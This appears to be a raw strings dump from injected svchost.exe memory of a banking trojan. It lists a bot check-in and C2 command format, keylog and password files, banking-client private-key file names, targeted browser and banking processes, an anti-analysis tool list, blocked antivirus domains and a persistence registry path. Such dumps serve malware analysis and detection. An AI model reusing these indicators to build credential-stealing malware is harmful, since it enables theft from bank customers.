\Opera\Opera\typed_history.xml
avast.com
avast.com
93.191.13.100
93.191.13.100
drweb
drweb
eset.com
eset.com
z-oleg.com
z-oleg.com
kltest.org.ru
kltest.org.ru
.comodo.com
.comodo.com
google.com
google.com
Dnsapi.dll
Dnsapi.dll
ws2_32.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/login.php
/login.php
ntdll.dll
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
Global\HighMemoryEvent_x
explorer.exe
explorer.exe
1.2.5
1.2.5
- zip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll
- zip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll
Winmm.dll
Winmm.dll
Kernel32.dll
Kernel32.dll
Gdi32.dll
Gdi32.dll
http://
http://
https://
https://
HTTP/1.
HTTP/1.
nspr4.dll
nspr4.dll
PR_OpenTCPSocket
PR_OpenTCPSocket
[[[URL: %s
[[[URL: %s
Process: %s
Process: %s
User-agent: %s]]]
User-agent: %s]]]
{{{%s
{{{%s
Crypt32.dll
Crypt32.dll
CertVerifyCertificateChainPolicy
CertVerifyCertificateChainPolicy
Wininet.dll
Wininet.dll
HttpSendRequestA
HttpSendRequestA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestExW
set_url
set_url
microsoft.public.win32.programmer.kernel
microsoft.public.win32.programmer.kernel
\iexplore.exe
\iexplore.exe
keygrab
keygrab
u.bmp
u.bmp
\\.\PhysicalDrive%u
\\.\PhysicalDrive%u
/topic.php
/topic.php
keylog.txt
keylog.txt
passwords.txt
passwords.txt
%s%u.zip
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
Referer: http://www.google.com
Referer: http://www.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
Content-Type: multipart/form-data; boundary=---------------------------%s
www.bing.com
www.bing.com
www.microsoft.com
www.microsoft.com
frd.exe
frd.exe
command=config&update_url=
command=config&update_url=
/search.php
/search.php
&port=
&port=
command=load&url=
command=load&url=
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
\chrome.exe
\chrome.exe
\svchost.exe
\svchost.exe
\java.exe
\java.exe
\javaw.exe
\javaw.exe
\javaws.exe
\javaws.exe
\opera.exe
\opera.exe
\firefox.exe
\firefox.exe
\maxthon.exe
\maxthon.exe
\avant.exe
\avant.exe
\mnp.exe
\mnp.exe
\safari.exe
\safari.exe
\netscape.exe
\netscape.exe
\tbb-firefox.exe
\tbb-firefox.exe
\frd.exe
\frd.exe
\isclient.exe
\isclient.exe
\ipc_full.exe
\ipc_full.exe
\intpro.exe
\intpro.exe
\cbsmain.dll
\cbsmain.dll
\clmain.exe
\clmain.exe
\core.exe
\core.exe
\rundll32.exe
\rundll32.exe
\notepad.exe
\notepad.exe
\cbank.exe
\cbank.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
%s.dbf
%s.dbf
%s.DBF
%s.DBF
j_password=
j_password=
pass.log
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edClientLogin=
edUserLogin=
edUserLogin=
edPassword=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
&LOGIN_AUTHORIZATION_CODE=
login=
login=
password=
password=
pass_
pass_
advapi32.dll
advapi32.dll
path.txt
path.txt
keys.zip
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
%s\d.bmp
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
keys
private.txt
private.txt
public.txt
public.txt
\*.key
\*.key
\self.cer
\self.cer
self.cer
self.cer
self.pub
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.exe
ctunnel.zip
ctunnel.zip
path_ctunnel.txt
path_ctunnel.txt
header.key
header.key
keys99
keys99
\header.key
\header.key
masks2.key
masks2.key
\masks2.key
\masks2.key
masks.key
masks.key
\masks.key
\masks.key
\name.key
\name.key
primary2.key
primary2.key
\primary2.key
\primary2.key
primary.key
primary.key
\primary.key
\primary.key
keys99.zip
keys99.zip
path99.txt
path99.txt
bsi.dll
bsi.dll
&domain=letitbit.net&
&domain=letitbit.net&
cc.txt
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
prv_key.pfx
keys\
keys\
sign.cer
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
sks2xyz.dll
vb_pfx_import
vb_pfx_import
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
secret.key
pubkeys.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
path1.txt
inter.zip
inter.zip
interpro.ini
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
cbsmain.dll
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
pass.txt
pass.txt
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
FilialRCon.dll
ISClient.cfg
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
rfk.zip
client.zip
client.zip
path_client.txt
path_client.txt
path_keys.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
Agava_Client.exe
KeysDiskPath
KeysDiskPath
Agava_Client.ini
Agava_Client.ini
Agava_keys
Agava_keys
keys_path.txt
keys_path.txt
mespro.dll
mespro.dll
AddPSEPrivateKeyEx
AddPSEPrivateKeyEx
core.exe
core.exe
data\id.dbf
data\id.dbf
\data\id.dbf
\data\id.dbf
keys%i.zip
keys%i.zip
path%i.txt
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
winmm.dll
%s\%s
%s\%s
LibVNCServer 0.9.7
LibVNCServer 0.9.7
%s (%s)
%s (%s)
d/d/d d:d
d/d/d d:d
password check failed!
password check failed!
WinSCard.dll
WinSCard.dll
SensApi.dll
SensApi.dll
GetTcpTable
GetTcpTable
IPHLPAPI.DLL
IPHLPAPI.DLL
dbghelp.dll
dbghelp.dll
MSVCRT.dll
MSVCRT.dll
PSAPI.DLL
PSAPI.DLL
NETAPI32.dll
NETAPI32.dll
DNSAPI.dll
DNSAPI.dll
HttpQueryInfoA
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestA
WININET.dll
WININET.dll
WS2_32.dll
WS2_32.dll
ShellExecuteA
ShellExecuteA
SHFileOperationA
SHFileOperationA
SHELL32.dll
SHELL32.dll
SHLWAPI.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetSystemWindowsDirectoryA
GetProcessHeap
GetProcessHeap
WinExec
WinExec
KERNEL32.dll
KERNEL32.dll
MapVirtualKeyW
MapVirtualKeyW
SetKeyboardState
SetKeyboardState
EnumChildWindows
EnumChildWindows
GetKeyboardState
GetKeyboardState
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
USER32.dll
USER32.dll
SetViewportOrgEx
SetViewportOrgEx
GetViewportOrgEx
GetViewportOrgEx
GDI32.dll
GDI32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
RegFlushKey
RegFlushKey
RegEnumKeyExA
RegEnumKeyExA
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegDeleteKeyA
RegDeleteKeyA
ADVAPI32.dll
ADVAPI32.dll
?456789:;<=
?456789:;<=
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
;3 #>6.&
;3 #>6.&
'2, / 0&7!4-)1#
'2, / 0&7!4-)1#
MSCTF.Shared.MAPPING.%x
MSCTF.Shared.MAPPING.%x
Desk_%u%x
Desk_%u%x
MSCTF.Shared.MUTEX.%x
MSCTF.Shared.MUTEX.%x
.Prev
.Prev
.current
.current
1-191j1w1}1
1-191j1w1}1
?"?(?-?~?
?"?(?-?~?
;-;5;=;^;|;
;-;5;=;^;|;
7"7)7\7~7
7"7)7\7~7
6 6$6(6,6064686
6 6$6(6,6064686
mavast.com
mavast.com
ya.ru
ya.ru
serverkey.dat
serverkey.dat
\windows\
\windows\
svchost.exe_956_rwx_00F30000_0006A000:
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
<>http
<>http
PSShL
PSShL
SSShp
SSShp
tUSSSh
tUSSSh
SSShp;
SSShp;
SSSh0
SSSh0
SSShpk
SSShpk
SSShpF
SSShpF
t9SSSh
t9SSSh
u1SSShP
u1SSShP
name.key
name.key
\secrets.key
\secrets.key
sign.key
sign.key
kernel32.dll
kernel32.dll
\explorer.exe
\explorer.exe
user32.dll
user32.dll
multi_pot.exe
multi_pot.exe
HookExplorer.exe
HookExplorer.exe
proc_analyzer.exe
proc_analyzer.exe
sckTool.exe
sckTool.exe
sniff_hit.exe
sniff_hit.exe
sysAnalyzer.exe
sysAnalyzer.exe
idag.exe
idag.exe
ollydbg.exe
ollydbg.exe
dumpcap.exe
dumpcap.exe
wireshark.exe
wireshark.exe
C:\iDEFENSE
C:\iDEFENSE
\\.\NPF_NdisWanIp
\\.\NPF_NdisWanIp
avp.exe
avp.exe
Software\Microsoft\Windows NT\CurrentVersion
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
software\microsoft\windows\currentversion\run
\winlogon.exe
\winlogon.exe
sysinfo.log
sysinfo.log
scr.bmp
scr.bmp
minidump.bin
minidump.bin
%d.%d.%d.%d
%d.%d.%d.%d
Ý %dh %dm
Ý %dh %dm
%s:%d
%s:%d
Software\Microsoft\Internet Explorer\TypedURLs
Software\Microsoft\Internet Explorer\TypedURLs
url%i
url%i
4.4.10
4.4.10
%dx%d@%d
%dx%d@%d
%c%d:d
%c%d:d
{Windows directory:
{Windows directory:
links.log
links.log
\History.IE5\index.dat
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
\Opera\Opera\typed_history.xml
avast.com
avast.com
93.191.13.100
93.191.13.100
drweb
drweb
eset.com
eset.com
z-oleg.com
z-oleg.com
kltest.org.ru
kltest.org.ru
.comodo.com
.comodo.com
google.com
google.com
Dnsapi.dll
Dnsapi.dll
ws2_32.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/login.php
/login.php
ntdll.dll
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
Global\HighMemoryEvent_x
explorer.exe
explorer.exe
1.2.5
1.2.5
- zip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll
- zip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll
Winmm.dll
Winmm.dll
Kernel32.dll
Kernel32.dll
Gdi32.dll
Gdi32.dll
http://
http://
https://
https://
HTTP/1.
HTTP/1.
nspr4.dll
nspr4.dll
PR_OpenTCPSocket
PR_OpenTCPSocket
[[[URL: %s
[[[URL: %s
Process: %s
Process: %s
User-agent: %s]]]
User-agent: %s]]]
{{{%s
{{{%s
Crypt32.dll
Crypt32.dll
CertVerifyCertificateChainPolicy
CertVerifyCertificateChainPolicy
Wininet.dll
Wininet.dll
HttpSendRequestA
HttpSendRequestA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestExW
set_url
set_url
microsoft.public.win32.programmer.kernel
microsoft.public.win32.programmer.kernel
\iexplore.exe
\iexplore.exe
keygrab
keygrab
u.bmp
u.bmp
\\.\PhysicalDrive%u
\\.\PhysicalDrive%u
/topic.php
/topic.php
keylog.txt
keylog.txt
passwords.txt
passwords.txt
%s%u.zip
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
Referer: http://www.google.com
Referer: http://www.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
Content-Type: multipart/form-data; boundary=---------------------------%s
www.bing.com
www.bing.com
www.microsoft.com
www.microsoft.com
frd.exe
frd.exe
command=config&update_url=
command=config&update_url=
/search.php
/search.php
&port=
&port=
command=load&url=
command=load&url=
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
\chrome.exe
\chrome.exe
\svchost.exe
\svchost.exe
\java.exe
\java.exe
\javaw.exe
\javaw.exe
\javaws.exe
\javaws.exe
\opera.exe
\opera.exe
\firefox.exe
\firefox.exe
\maxthon.exe
\maxthon.exe
\avant.exe
\avant.exe
\mnp.exe
\mnp.exe
\safari.exe
\safari.exe
\netscape.exe
\netscape.exe
\tbb-firefox.exe
\tbb-firefox.exe
\frd.exe
\frd.exe
\isclient.exe
\isclient.exe
\ipc_full.exe
\ipc_full.exe
\intpro.exe
\intpro.exe
\cbsmain.dll
\cbsmain.dll
\clmain.exe
\clmain.exe
\core.exe
\core.exe
\rundll32.exe
\rundll32.exe
\notepad.exe
\notepad.exe
\cbank.exe
\cbank.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
%s.dbf
%s.dbf
%s.DBF
%s.DBF
j_password=
j_password=
pass.log
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edClientLogin=
edUserLogin=
edUserLogin=
edPassword=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
&LOGIN_AUTHORIZATION_CODE=
login=
login=
password=
password=
pass_
pass_
advapi32.dll
advapi32.dll
path.txt
path.txt
keys.zip
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
%s\d.bmp
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
keys
private.txt
private.txt
public.txt
public.txt
\*.key
\*.key
\self.cer
\self.cer
self.cer
self.cer
self.pub
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.exe
ctunnel.zip
ctunnel.zip
path_ctunnel.txt
path_ctunnel.txt
header.key
header.key
keys99
keys99
\header.key
\header.key
masks2.key
masks2.key
\masks2.key
\masks2.key
masks.key
masks.key
\masks.key
\masks.key
\name.key
\name.key
primary2.key
primary2.key
\primary2.key
\primary2.key
primary.key
primary.key
\primary.key
\primary.key
keys99.zip
keys99.zip
path99.txt
path99.txt
bsi.dll
bsi.dll
&domain=letitbit.net&
&domain=letitbit.net&
cc.txt
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
prv_key.pfx
keys\
keys\
sign.cer
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
sks2xyz.dll
vb_pfx_import
vb_pfx_import
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
secret.key
pubkeys.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
path1.txt
inter.zip
inter.zip
interpro.ini
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
cbsmain.dll
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
pass.txt
pass.txt
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
FilialRCon.dll
ISClient.cfg
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
rfk.zip
client.zip
client.zip
path_client.txt
path_client.txt
path_keys.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
Agava_Client.exe
KeysDiskPath
KeysDiskPath
Agava_Client.ini
Agava_Client.ini
Agava_keys
Agava_keys
keys_path.txt
keys_path.txt
mespro.dll
mespro.dll
AddPSEPrivateKeyEx
AddPSEPrivateKeyEx
core.exe
core.exe
data\id.dbf
data\id.dbf
\data\id.dbf
\data\id.dbf
keys%i.zip
keys%i.zip
path%i.txt
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
winmm.dll
%s\%s
%s\%s
LibVNCServer 0.9.7
LibVNCServer 0.9.7
%s (%s)
%s (%s)
d/d/d d:d
d/d/d d:d
password check failed!
password check failed!
WinSCard.dll
WinSCard.dll
SensApi.dll
SensApi.dll
GetTcpTable
GetTcpTable
IPHLPAPI.DLL
IPHLPAPI.DLL
dbghelp.dll
dbghelp.dll
MSVCRT.dll
MSVCRT.dll
PSAPI.DLL
PSAPI.DLL
NETAPI32.dll
NETAPI32.dll
DNSAPI.dll
DNSAPI.dll
HttpQueryInfoA
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestA
WININET.dll
WININET.dll
WS2_32.dll
WS2_32.dll
ShellExecuteA
ShellExecuteA
SHFileOperationA
SHFileOperationA
SHELL32.dll
SHELL32.dll
SHLWAPI.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetSystemWindowsDirectoryA
GetProcessHeap
GetProcessHeap
WinExec
WinExec
KERNEL32.dll
KERNEL32.dll
MapVirtualKeyW
MapVirtualKeyW
SetKeyboardState
SetKeyboardState
EnumChildWindows
EnumChildWindows
GetKeyboardState
GetKeyboardState
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
USER32.dll
USER32.dll
SetViewportOrgEx
SetViewportOrgEx
GetViewportOrgEx
GetViewportOrgEx
GDI32.dll
GDI32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
RegFlushKey
RegFlushKey
RegEnumKeyExA
RegEnumKeyExA
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegDeleteKeyA
RegDeleteKeyA
ADVAPI32.dll
ADVAPI32.dll
?456789:;<=
?456789:;<=
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
;3 #>6.&
;3 #>6.&
'2, / 0&7!4-)1#
'2, / 0&7!4-)1#
MSCTF.Shared.MAPPING.%x
MSCTF.Shared.MAPPING.%x
Desk_%u%x
Desk_%u%x
MSCTF.Shared.MUTEX.%x
MSCTF.Shared.MUTEX.%x
.Prev
.Prev
.current
.current
SYSTEM!XP3!F9BE9A8A
SYSTEM!XP3!F9BE9A8A
MSCTF.Shared.MAPPING.fffffe00
MSCTF.Shared.MAPPING.fffffe00
MSCTF.Shared.MAPPING.ffffff00
MSCTF.Shared.MAPPING.ffffff00
MSCTF.Shared.MAPPING.fffffd00
MSCTF.Shared.MAPPING.fffffd00
MSCTF.Shared.MUTEX.fffffe00
MSCTF.Shared.MUTEX.fffffe00
MSCTF.Shared.MUTEX.ffffff00
MSCTF.Shared.MUTEX.ffffff00
%System%\config\systemprofile\Application Data\
%System%\config\systemprofile\Application Data\
1-191j1w1}1
1-191j1w1}1
?"?(?-?~?
?"?(?-?~?
;-;5;=;^;|;
;-;5;=;^;|;
7"7)7\7~7
7"7)7\7~7
6 6$6(6,6064686
6 6$6(6,6064686
mavast.com
mavast.com
ya.ru
ya.ru
serverkey.dat
serverkey.dat
\windows\
\windows\
svchost.exe_1020_rwx_00AC0000_0005B000:
.text
.text
`.data
`.data
.reloc
.reloc
`.rdata
`.rdata
@.data
@.data
<>http
<>http
PSShL
PSShL
SSShp
SSShp
tUSSSh
tUSSSh
SSShp;
SSShp;
SSSh0
SSSh0
SSShpk
SSShpk
SSShpF
SSShpF
t9SSSh
t9SSSh
u1SSShP
u1SSShP
name.key
name.key
\secrets.key
\secrets.key
sign.key
sign.key
kernel32.dll
kernel32.dll
\explorer.exe
\explorer.exe
user32.dll
user32.dll
multi_pot.exe
multi_pot.exe
HookExplorer.exe
HookExplorer.exe
proc_analyzer.exe
proc_analyzer.exe
sckTool.exe
sckTool.exe
sniff_hit.exe
sniff_hit.exe
sysAnalyzer.exe
sysAnalyzer.exe
idag.exe
idag.exe
ollydbg.exe
ollydbg.exe
dumpcap.exe
dumpcap.exe
wireshark.exe
wireshark.exe
C:\iDEFENSE
C:\iDEFENSE
\\.\NPF_NdisWanIp
\\.\NPF_NdisWanIp
avp.exe
avp.exe
Software\Microsoft\Windows NT\CurrentVersion
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
software\microsoft\windows\currentversion\run
\winlogon.exe
\winlogon.exe
sysinfo.log
sysinfo.log
scr.bmp
scr.bmp
minidump.bin
minidump.bin
%d.%d.%d.%d
%d.%d.%d.%d
Ý %dh %dm
Ý %dh %dm
%s:%d
%s:%d
